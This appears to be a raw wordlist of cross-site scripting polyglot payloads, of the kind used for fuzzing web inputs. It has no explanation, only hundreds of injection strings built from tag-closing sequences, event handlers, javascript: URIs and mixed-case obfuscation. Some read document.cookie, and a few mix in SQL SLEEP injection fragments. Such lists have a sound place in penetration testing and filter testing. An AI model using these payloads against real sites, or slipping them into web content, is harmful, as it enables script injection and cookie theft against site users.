0x0://'/</title></style></textarea></script>--><p"/onclick   =alert()//>*/alert()/*
63
<a id='' onclick=alert()>   <script>alert()</script>   <input onfocus=alert() autofocus>
<a id='' onclick=alert()> <script>alert()</script> <input onfocus=alert() autofocus>
"-alert(1)-"'-alert(1)-'\"; alert(1)//&lt;img src=x onerror=alert(1)&gt;*/alert(1)/*${alert(1)}<frame src=javascript:alert(1);></template></noembed></noscript></style></textarea></title><script>alert(1)</script>--><svg onload=alert(1)>
alert(1)//"' ;alert(1)//onclick=alert(1) '" onclick=alert(1)
\";alert(1);//";alert();//';alert();//`;alert();//--></title></textarea></style></noscript></noembed></template></frameset></option></script><img src=0 onerror=alert() />*/alert();//<script>alert()</script>"alert();//
';alert()//';alert()//";alert()//";alert(String.fromCharCode()//--></SCRIPT>">'><SCRIPT>alert()</SCRIPT>
'|alert()|'+"|alert()|";alert()//</noscript></script></title></textarea>%0a%0d<svg/onclick=alert()>
'|alert()|'+"|alert()|";alert()//</noscript></script></title></textarea>%0a<svg/onclick=alert()>
*/";alert();//';alert();//‘;alert();></title></style></textarea></script>--></noscript><script>alert();</script><!--
*/alert();';alert();//">'></textarea></script><script>alert()</script> <!--'--><svg onload=alert()>
alert()//<div onclick=alert()><img src=1 onerror=alert()><script>alert()</script>alert()
/*`/*'/*"/*\"/**/(alert() )//<frame src=javascript:alert()></noscript><input type=image src=x onerror=alert()></noembed></template></stYle/</titLe/</teXtarEa/</scRipt/--!><sVg/oNloAd=alert()>
"';   alert();   onclick=alert();   onerror=alert();
"'; alert(); onclick=alert(); onerror=alert();
"|alert()|" ' onclick=alert();//'</title></script></iframe></textarea><body onclick="alert()">
alert();-->*/"/'</script>/alert()/onclick=alert()'"</title></textarea></style><p onclick=alert()>a'
/*`/*\"/*'/*"/**/(alert())//--></script></noscript></noembed></template></title></textarea></style>\"<script>alert()</script>
";alert()//--></script></option></select></template></noembed></noscript></style></textarea></title>"'><svg/onload=alert()>
';alert();'"</script><p onclick=alert()> onclick=alert() />--><script>alert()</script>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
*/alert()/*\*'\"--></style></script><script>alert()</script><img src=x onclick=alert()><div onclick=alert()>
'";alert();"></textarea></style><svg onload=alert()>
alert();//'"--></title></style></textarea></script><a%0d%0A onclick=alert()//>x
*/alert()/*'-->"--></title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>alert()</script>
"a"; */ onclick=alert(); /*
avascript://'/</title></style></textarea></script>--><p"   onclick=alert()//>*/alert()/*
avascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
<button '" onclick=alert(1)//>*/alert()/*
<button ' onclick=alert(1)//>*/alert(1)//
<!--/*--><![CDATA[/*>"'</textarea></div></title></script><a onclick=alert()>x<!--*/
"'></div></title></textarea></style></noscript></noembed></template></frameset></option></select></script></iframe>--><svg onload=alert()>
</div></title></textarea></style></noscript></noembed></template></option></select>'>">'--></script><script>alert(1)</script>
eval('alert()')//<div onclick=alert()><img src=1 onerror=alert()><script>alert()</script><a href=javascript:alert()>a</a>
<frame src=javascript:alert()>/*`/*'/*"/*\"/**/(alert() )//%d%a</noscript><input type=image src=a onerror=alert()></noembed></template></stYle/</titLe/</teXtarEa/</scRipt/--!><sVg/oNloAd=alert()//>
'--><IMG SRC= x onerror=alert("xss")>
'"/>><img src=x onerror=prompt(document.domain);>
<input onclick=alert() onfocus=onclick() onload=onclick() onblur=onclick()><object onclick=alert()>javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*’/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
<input type="button" value="click" onClick="alert('xss')">
javascript://\" alert()//
javascript:alert(1);//";alert(1);//';alert(1);//`;alert(1);//</select></iframe></noscript></noembed></title></textarea></style></script>">'>-->%26lt;<img src=x onerror=alert(1)> alert(1);//
javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)>&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt; alert(1)//
javascript:alert(1);"; onclick=alert(1);// '; onclick=alert(1);//--></style></script><button onclick=alert(1);>  
javascript:alert(1)//'//"//</script><script>alert(1)</script>--><div   onclick=alert(1)//*/alert(1)/*>
javascript:alert(1)//'//"//</script><script>alert(1)</script>--><div onclick=alert(1)//*/alert(1)/*>
javascript:alert(1)//}</style></title></textarea></script>--><button '" onclick=alert(1)//>*/alert()/*
javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"></title></textarea></style></noscript></noembed></template></select>&lt;svg/oNloAd=alert()&gt;<FRAME onload=alert()></script>\";alert()//<svg/oNloAd=alert()>
javascript:alert();//`;alert(1)//-->';alert();//";alert()//><frame src="javascript:alert()"></title></textarea></style></noscript></noembed></template></script>&lt;<script>alert();//&lt;</script>
javascript:alert();//";/*';/*`;/**/ alert(1);//</noscript></style></title></textarea></noembed></template>--></script><frame src="javascript:alert()"><svg onload='alert(1)'><script>alert();</script>
javascript:alert()//;alert();//*/;alert()//;';alert();//";alert();//`;alert();//</title></textarea></style></script></noscript></noembed></template><frame src=javascript:alert()></option></select>"'--><svg onload=alert()>\";alert();//
javascript:alert()`-alert()`//'-alert()-'"-alert()-"<FRAME SRC=javascript:alert()//</textarea></title>--></style></script></template></noscript>*/alert()/*</noembed><script>alert()</script>\"-alert()//
javascript:alert()//"+alert()//'+alert()//`+alert()//</title></textarea></noscript></noembed></style></template></select></script>-->'>"><frame src=javascript:alert(1)><svg onload=alert()><!--*/ alert()//
javascript:alert()//';alert();'";alert()//</script> onclick=alert() --></title><script>alert()</script>*/alert() /*
javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() &lt;img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script>
javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()>&lt;svg/onload=alert(1)&gt; alert()//
javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()>&lt;svg/onload=alert()&gt; alert(1)//
javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame &lt;svg onload=alert()><script>alert()</script>
javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert()   alert()
javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert() alert()
javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert() alert()    
javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script>&lt;<svg onload=alert()>
javascript:alert()//`/*"/*'/**/+alert();//--></title></textarea></style></noscript></noembed></template></option></select></script><svg/onload=alert()>
javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>-->&lt;<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()>
javascript:alert()//<frame/src=javascript:alert()>&lt;svg/onload=alert()&gt`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//*
javascript:alert()//&lt;img src=1 onerror=alert()&gt;"onmouseover=alert() 'onmouseover=alert()</template> </frameset> </noscript></title>--></textarea></style><svg src=1 onerror=alert()></script>'-alert()-';"-alert()-";${alert()}</option></select></noembed><script>alert()</script>
javascript:alert();//&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--
javascript:alert();//&lt;svg/onload= alert()>/*"/*'/*`/*\"/**/ alert()();//</div/</title/</textarea/</style/</noscript/</noembed/</script/--!></template><script>alert()()</script>
javascript:alert()//\ /*&lt;svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()//
javascript:alert()//</noscript></noembed></template>jaVasCript:/*`/*\`/*'/*"/**/(/* */alert())//</style/</titLe/</textarea/</scRipt/--><script>alert()</script>&lt;svg/onload=alert()&gt;<frame src="javascript:alert(1)">
javascript:alert()//"//'   onclick=alert()//--></style></script><script>alert()</script>*/alert()/*
javascript:alert()//"//' onclick=alert()//--></style></script><script>alert()</script>*/alert()/*
jaVaScript:alert()//<sCriPt>/*`/*'/*"/**/(alert())//</stYle/</titLe/</teXtarEa/</noEmBed/</nOscRipt/</scRipt/--!></teMpLate><sVg/oNloAd=alert()>\" alert()//
javascript:alert()//</script>--><frame src="javascript:alert()"></option></select></template></noscript></noembed></title></style></textarea>'"><body onload="alert()">
javascript:alert()//--></script></textarea></style></title><a"//'   onclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*  
javascript:alert();//</script></textarea></title></style>%0d%0a<x onclick=alert()//>x
javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="&lt;svg/onload=alert()>"><frame/onload=alert()>*/ alert()//
javascript:alert()//<svg/onload=alert()>'-alert("-alert()-")-'
javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script>&lt;<svg onload=alert()>&gt;
javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg &lt;svg onload=alert()> alert()//
javascript:/*'/*\""/*`/**/;alert();//--></title></style></noscript></textarea></noembed></template><frame onload=alert()></script><script>alert()</script>
javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//>   alert()//
javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> alert()//
javascript:alert()//</title></style></textarea></noscript></template></noembed>&lt;script&gt;alert()&lt;/script&gt-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/*
javascript:alert()/*"'</title></style></textarea></script/-->*/<a%0d%0a onclick=alert()//>x
javascript:alert();//'"</title></style></textarea></script/--><a/%0d%0a onclick=alert()//>x
javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()>&lt;<script>alert()&lt;</script>
javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*&lt;svg onload=alert()&gt;*/ alert()//</script>
javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>-->&lt;<svg onload=alert()><frame src=javascript:alert()>
javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script>&lt;svg/<frame/onload=alert()>
javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//&lt;svg <frame */onload= alert()//</script>
javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``>&lt;<svg/onload=alert()>
javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()-->&lt;<svg/onload=alert()>
javascript:alert()//</title></textarea></style></script --><svg '//"   onclick=alert()//>
javascript:alert()//</title></textarea></style></script --><svg '//" onclick=alert()//>
javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>-->&lt;<svg/onload=alert()><frame/src=javascript:alert()>
javascript://'/</div></title></textarea></div></script>--><p" onclick=alert()//>*/alert()/*
javascript://'</div></title></textarea></style></script>--><x" onclick=alert()//>*/alert()/*
javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script -->&lt;<script>alert()&lt;</script>\ /**/alert()//
javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//&lt;svg onload= alert()//</script>
javascript:/*\"+/*&lt;script>//<script>//`//"//'//*/ alert()//&lt;/script></script></textarea></noscript></noembed></style></template></title>--><svg/onload=alert()>
javascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
/´`'*--\\'">javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression(/*’/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script>&lt;<svg/onload= alert()//>
javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()>&lt;<svg/onload= /**/alert()//>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><body \" x=/*&lt;<svg/*/onload=alert()//>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//'"/*–>]]>%>?></object></script></title></style></noembed></template></frameset></option></select></noscript></textarea>!-->><img src=1 onerror=alert(1)>’
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('')//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e  
jaVasCript:/*-/*`/*`/*'/*'"/**/(/**/oNCliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3epolyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</style/</teXtarEa/</noscript/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
-->jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</title></textarea></iframe></style></noscript></noembed></template></ScRipT></div><ScRiPt>alert()</ScRipT>&lt;sVg/oNloAd=alert()//>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(document.domain) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(document.domain)//>\x3e
javASCripT:/*\\"/*\"/*'/*`/**/(/**/onClICk=alert``)//</tITLE/</stYLE/</tEXtarEa/--><scrIPT>alert``</SCripT>&lt;<sVg/oNloAd=alert()>
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//</title></textarea></style></noscript></noembed></template></frameset></option></select>--><script>alert()</script>
javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//</title></textarea></style></noscript></noembed></template></option></select>--><script>alert()</script><frame src="javascript:alert(1)">
jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//&lt;svg/onload=alert()&gt;<frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//>
jaVasCript:/*-/*`/*\`/*'/*"/**/( oNmouseover=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
javascript:/*--></script>">[img=1]<img -/style=-=expression(/*’/-/*',/**/alert()//);-o-link:javascript:eval(title);-o-link-source:current onclick=alert() background=javascript:alert()>"<svg onclick=alert()>
javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()-->&lt;<svg/*/ onload=alert()//>
javascript://</script></style></textarea>--><script>//*/alert(1)/*"//' onclick=alert(1)//</script>
javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]&lt;<script>///<frame */ onload=alert()//&lt;</script>
javascript://--></script></textarea></title></style><hr onclick=   onclick=alert()
javascript://--></script></textarea></title></style><hr onclick= onclick=alert()
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a  
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*'   onclick=alert()//>
javascript://--></script></title></style>"/</textarea>*/<alert()/*'   onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*'  onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>d
javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/&lt;svg/*/onload= alert()//</script>
javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*&lt;svg <frame */ onload=alert()//</script>
javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame &lt;svg"///*/ onload=alert()//</script>
javascript://'/</style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*&lt;i<frame/*/ onload=alert()//</Script>
javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//-->&lt;<sVg/onload=alert``>
jaVasCript://</stYle/'/</titLe/</teXtarEa/</scRipt/-->*/<alert()/*"  oNcliCk=alert()//>x
javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript>&lt;<script/>/<frame */; onload=alert()//&lt</script>`
javascript:/*"/*</template/--></select></stYle></titLe></teXtarEa/></scRipt></noScript></noembed>`/*'/*\"/*<frameset */ ( onload=alert() )//>xxxxxxxxxxxxxxxx
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/&lt;<frame */ onload=alert()//</script>
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/&lt;i<frame */ onload=alert()//</script>
javascript:/*--></textarea></style></button></script></meta><select/onclick='+/"/+/[*/[]/+alert()//'>
javascript://'//"  --></textarea></style></script></title><b onclick=  alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame &lt;svg */ onload=alert()//</script>
javascript://</title>"/</script></style></textarea/-->*/<alert()/*'   onclick=alert()//>/
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*&lt;svg <frame onload=/**/alert()//</script>
javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//&lt;img src onerror&equals;alert&lpar;&rpar;&gt;
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*&lt;svg onload=' /**/-alert()//'&gt;`
javascript://*'"/</title></style></textarea></script>--><a%0A onclick=alert()//%0A>x
javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
javascript://'"</title></style></textarea></script/--><a/%0d%0a onclick=alert()//>x
javascript://</title></style></textarea>--></script><a"//'   onclick=alert()//>*/alert()/*
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
 javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*  
javascript://'/</title></style></textarea></script>--><p"%0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea>>/script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/>/title></style></textarea></script>--><p "%0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/* zzzzz
 javascript://'/</title></style></textarea></script>--><p"   onclick=alert()//>*/alert()/*
javascript:/*'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p"   onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p"  onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*  
javascript://'/</title></style></textarea></script>--><select   */onclick=alert()><o>1<o>'//"<!--
javascript://'/</title></style></textarea></script>--><svg onclick=alert()
javascript://--></title></style></textarea></script><svg "//'   onclick=alert()//
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
javascript://'/</title></style></textarea></script>--><svg onclick=alert()//>*/alert()/*
javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
javascript:/*--></title></style></textarea><ScRipT var x = <ScRipT>alert()</ScRipT></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert()//'>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript://'/</title></style></textarea><svg" onclick=alert()//></script>-->*/alert()/*
javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>-->&lt;<script>alert()&lt;</script><frame/*/ onload=alert()//>
javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>&lt;<script> /**/alert()//&lt;</script><frame onload=alert()>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/&lt;svg */ onload=alert()//</script>
javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script>&lt;<script>/*` /*<frame src=javascript:/**/alert()//>&lt;</script>
javascript://</title></textarea></style></script --><li '//"  '*/alert()/*', onclick=alert()//
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
jaVaSCriPt:/*\\x3csvG/oNloAd=alert()\\x3e*/alert()//</stYle/</tiTle/</texTarEa/</scrIpt/--!><sVg//*`/*\"/*'/**/(_=alert())//\\%0a;alert()//'/oNlOad=alert() OncLick=alert()//>;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoKT4K}}--></script></option></select></frameset></template></noembed></noscript></style></textarea></title>';alert();'";alert();"--><svg onload=alert()>
</noembed></noscript></option></select></template>/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//</stYle/</titLe/</teXtarEa/</scRipt/--!><sVg/oNloAd=alert()//>
</noembed></template></script><svg/onload=alert()//</script>
"'--></noscript></noembed></template></title></textarea></style><script>alert()</script>
</noscript><script>alert(1)</script>
</noscript></style></script></textarea></title>"'--><img/src/onerror=alert()>
"'>-->*/</noscript></title><script>alert(0)</script>
/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
" onclick=alert(1)//<button ' onclick=alert()//>
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
" onclick=alert(1)//<button ' onclick=alert(1)//>*/alert(1)//
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
onclick=alert()//<b onclick=alert()//>*/alert()//'"--></style><SCRIPT>alert()</SCRIPT><div>onclick=alert()//<b' onclick=alert()//>*/alert()
" onclick=alert() //<button ' onclick=alert()//>
" onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//>
' onclick=alert();//'"></noscript></title></script></iframe></textarea><body onclick="alert()">
"onclick=alert()//<svg/onclick=alert()//'onclick=alert()//<id onclick=alert()//";onclick=alert()//</style onclick=alert()//</script><svg '//" onclick=alert(1)//
' onclick=alert();//'"></title></script></iframe></textarea><body onclick="alert()">
'"onerror=alert(1);>javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
*/" onload=;alert();//';alert();//‘;alert();></title></style></textarea></script>--></noscript></noembed></template></frameset><script>alert();</script><!--
onmouseover=alert() " onmouseover=alert() */ onmouseover=alert() */ '<div onclick=alert()>'
<p" %0A onclick=alert()//>
<q/oncut=alert()</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/*
'`"*/ /><script>alert('123');</script>
`"*/>'--><script>alert('123');</script>
><script>alert(1)</script>
</script>-->alert()"';alert();'<script>alert()</script> onclick=alert() */alert()/*
><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> "><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert ()</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert()</script> <img src="javascript:alert()"> <img src="http://xxx.com/yyy.png" onerror="alert()">
--> <script>alert()</script>
<script>alert()</script>//<svg/onload=alert()>//<a class="" onclick=alert(1)//<button value=test 'onclick=alert()//>*/alert();/*
*/`"'--><script>alert("XSS");</script><!--'"`/*
//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--
//'/<@/></script></div></script>--><select\   */onclick=alert()><o>1<o>2')//"<!--
<script>/* \n{{  javascript://'/</title></style></textarea></script>--><p"   onclick=alert()//>*/alert()/*}} \n*/</script>
<script>onclick=alert()</script><div onclick=alert()>
"'></script></option></select></template></frameset></noscript></style></textarea></noembed></title>--><img src=x onerror=alert(1)//
</script><svg onload='-/"/-alert(1)//'
--></script></title></style>"/</textarea><a'  onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/" /*
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"/**/ /*!/*/ // /*/*/
"'--></style></script><svg onload=alert()>
<!--'<!--"<!--`--></style></title></script></textarea></noembed></template></script><body><script>alert()</script>
"+'<svg/onclick=alert().source;;throw'atom';//>
"<svg/onclick=alert().source;;throw'atom';//>
'--><svg onload=alert()>
'--><svg onload=alert()>-->
//"//'//--> <svg onload=alert()>
"'--><svg onload=alert(1)><!--
'"><svg onload=alert(1)>
'--><svg onload=alert(1) />
